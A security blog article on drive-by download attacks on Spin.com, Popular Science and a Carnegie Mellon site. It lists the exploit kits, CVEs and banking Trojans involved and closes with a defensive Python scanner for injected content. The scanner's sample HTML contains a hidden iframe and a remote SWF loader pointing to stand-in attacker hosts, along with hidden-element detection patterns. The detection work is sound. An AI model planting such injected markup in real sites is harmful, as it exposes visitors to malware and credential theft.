The websites Spin.com and Popular Science magazine were hit by drive-by download attacks: anyone who visited these sites at the end of October was silently redirected to a RIG exploit kit landing page, which then installed data-stealing malware on computers running a vulnerable browser or plugin.
jQuery.com was hit by the same kind of attack near the end of September, putting its main audience, IT system administrators and web developers, at risk of infection. JPMorgan Chase customers were also targeted with the very same exploit kit in the 'Smash & Grab' phishing email campaign.
Symantec reports that the Spin.com attack was carried out by injecting an iframe into the site's HTML, as shown in the screenshot from their analysis:
Websense reports the same type of iframe injection on Popular Science:
Visitors are redirected to the exploit kit landing page, which first checks whether certain antivirus products are installed on the machine. If one is found, the kit does not drop its payload, so that it is not detected.
If no antivirus is found, the kit probes for known vulnerabilities in several client applications:
Microsoft Internet Explorer
- Use-after-free remote code execution (CVE-2013-2551 & CVE-2014-0322)
- Information disclosure (CVE-2013-7331)
Microsoft Silverlight
- Double dereference remote code execution (CVE-2013-0074)
Oracle Java SE
- Memory corruption (CVE-2013-2465)
- Remote Java Runtime Environment code execution (CVE-2012-0507)
Adobe Flash Player
- Remote code execution (CVE-2014-0497)
According to Symantec, the payloads dropped include information stealers such as the banking Trojan Infostealer.Dyranges and Trojan.Zbot (Zeus). Dyranges affects only Windows systems; once installed and running, it monitors the URLs loaded in web browsers and steals the usernames and passwords entered on the sites it is watching for.
This malware, better known as Dyre (or Dyreza), typically targets banking websites, but a variant has also been seen targeting Salesforce.com customers via phishing emails, perhaps seeking the personal data held in those customers' accounts.
Zeus also runs only on Windows and steals confidential information: details about the infected system, online credentials and banking data. The Trojan contacts a command and control server to upload what it has collected and to receive further commands, which can include downloading and executing files, shutting down or rebooting the system, or deleting system files.
University Hit with Flash-Based Redirection Script
According to research by Malwarebytes Labs, this type of attack is extremely common and has compromised thousands of websites, including a site on the Carnegie Mellon University domain.
Attackers injected code that loads a remote Flash application (a SWF file) into the site in order to compromise its visitors, redirecting them to the Angler Exploit Kit landing page, which probes for Java and Flash vulnerabilities.
The researchers note that the injected code is long, messy and unnecessarily complex; the same redirection could be accomplished with a single line of iframe code. The kit also exploits the Microsoft Internet Explorer use-after-free vulnerability CVE-2014-1776 to execute arbitrary code in the browser. The payload, the Tinba banking Trojan, is then downloaded onto the user's Windows system, where it steals user information much as Dyranges and Zeus do.
The researchers found a few likely weak points: the Carnegie Mellon Department of Statistics site was built on Drupal, which had just been hit by a highly critical SQL injection vulnerability in Drupal core (CVE-2014-3704), and the server was running an outdated, vulnerable version of Apache. They also acknowledge that there are many other ways a website can be breached, including via stolen credentials.
To check for infection, the researchers recommend that website owners:
- Check the very bottom of the site's HTML source for the malicious remote Flash application code
- Audit the site for outdated content management software or plugins that could give attackers a way in
- Keep Flash applications updated, and disable Java plugins if possible
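The first check above, together with the iframe injection described in the Symantec and Websense reports earlier on this page, can be scripted. The following is an added example, not code from the original article or from Malwarebytes or Symantec: it parses a page's HTML and flags off-site iframes that are sized or styled to be invisible (the RIG pattern) and `<object>`, `<embed>` or `<param>` elements that load a SWF from another host, noting when such an element sits after `</body>`, which is where the appended Angler redirector was found. The host names and the sample page are constructed for illustration.

```python
"""Scan a page's HTML for injected hidden iframes and remote Flash loaders.

Added example; not the original article's or any vendor's code.
Host names and SAMPLE_HTML below are constructed, not taken from a real site.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

# Inline styles commonly used to make an injected iframe invisible.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}", re.I)


def _px(value):
    """Parse a width/height attribute such as '1' or '1px' to an int, else None."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


class InjectionScanner(HTMLParser):
    """Collect (kind, url, line) findings while parsing one page."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.after_body = False   # becomes True once </body> has been seen
        self.findings = []

    def _offsite(self, url):
        host = urlparse(url).hostname
        return bool(host) and host.lower() != self.site_host

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}   # attribute names are lowercased by HTMLParser
        line = self.getpos()[0]
        if tag == "iframe":
            src = a.get("src", "")
            w, h = _px(a.get("width")), _px(a.get("height"))
            tiny = (w is not None and w <= 1) or (h is not None and h <= 1)
            hidden = bool(HIDDEN_STYLE.search(a.get("style", "")))
            if self._offsite(src) and (tiny or hidden):
                self.findings.append(("hidden-iframe", src, line))
        elif tag in ("object", "embed", "param"):
            if tag == "param":
                # <param name="movie" value="..."> inside an <object> also names the SWF
                url = a.get("value", "") if a.get("name", "").lower() in ("movie", "src") else ""
            else:
                url = a.get("data") or a.get("src") or ""
            if url.lower().split("?")[0].endswith(".swf") and self._offsite(url):
                kind = "trailing-remote-swf" if self.after_body else "remote-swf"
                self.findings.append((kind, url, line))

    def handle_endtag(self, tag):
        if tag == "body":
            self.after_body = True


def scan_html(html, site_host):
    """Return a list of (kind, url, line) for suspicious elements in html.

    site_host is the page's own host; elements loading from any other host
    are treated as off-site."""
    scanner = InjectionScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: one legitimate same-site iframe, one injected hidden
# off-site iframe, and a remote SWF object appended after </html>.
SAMPLE_HTML = """<html><head><title>Department of Statistics</title></head>
<body>
<p>Legitimate content.</p>
<iframe src="https://www.example.edu/embed/player" width="640" height="360"></iframe>
<iframe src="http://evil.example.net/landing.php" width="1" height="1" style="visibility:hidden"></iframe>
</body></html>
<object type="application/x-shockwave-flash" data="http://evil.example.org/redirect.swf" width="1" height="1">
<param name="movie" value="http://evil.example.org/redirect.swf">
</object>
"""

if __name__ == "__main__":
    for kind, url, line in scan_html(SAMPLE_HTML, "www.example.edu"):
        print(f"line {line}: {kind} -> {url}")
```

Run it against the saved HTML of your own home page with your site's host name; a "trailing-remote-swf" or "hidden-iframe" finding is worth a manual look, and anything after `</body>` that your templates did not put there is the signature the researchers describe. The scanner intentionally ignores same-site iframes and embeds so that normal video players and widgets do not produce noise.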
To limit the damage from a drive-by download, investing in additional authentication security can stop attackers from remotely accessing your accounts even if a Trojan has stolen your credentials. Learn more from our Two-Factor Authentication Resources.